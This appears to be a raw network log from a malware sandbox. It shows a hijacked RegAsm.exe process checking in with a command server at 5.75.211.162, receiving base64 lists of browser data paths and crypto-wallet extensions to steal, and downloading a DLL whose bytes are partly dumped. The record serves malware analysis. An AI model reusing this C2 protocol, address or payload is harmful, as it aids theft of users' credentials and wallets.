2024-09-26 22:15:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49788	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:42 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAFIIJDAAAAKFHIDAAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:42 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 42 32 39 41 38 33 39 37 35 30 33 30 31 32 33 34 33 35 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 49 49 4a 44 41 41 41 41 4b 46 48 49 44 41 41 41 2d 2d 0d Data Ascii: ------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="hwid"28B29A8397503012343576-a33c7340-61ca------DAAFIIJDAAAAKFHIDAAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DAAFIIJDAAAAKFHIDAAA--
2024-09-26 22:15:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:43 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|9a3580c327c4253a7abef4677ad29744\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49789	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:44 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:44 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DGHJECAFIDAFHJKFCGHICont
2024-09-26 22:15:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:44 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49790	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:45 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAECAECFCAAEBFHIEHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:45 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------GDAECAECFCAAEBFHIEHDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDAECAECFCAAEBFHIEHDCont
2024-09-26 22:15:46 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:46 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49791	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:46 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCGCGDHJEGHJKFHJJJKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:46 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 43 47 44 48 4a 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------FCGCGDHJEGHJKFHJJJKJContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------FCGCGDHJEGHJKFHJJJKJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FCGCGDHJEGHJKFHJJJKJCont
2024-09-26 22:15:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:47 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49792	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:48 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 7153 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:48 UTC	7153	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 61 33 35 38 30 63 33 32 37 63 34 32 35 33 61 37 61 62 65 66 34 36 37 37 61 64 32 39 37 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="token"9a3580c327c4253a7abef4677ad29744------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KFBGDBFBKKJECBFHDGIECont
2024-09-26 22:15:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49793	5.75.211.162	443	1144	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:49 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:49 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:49 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:15:49 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:15:49 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:15:49 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:15:50 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
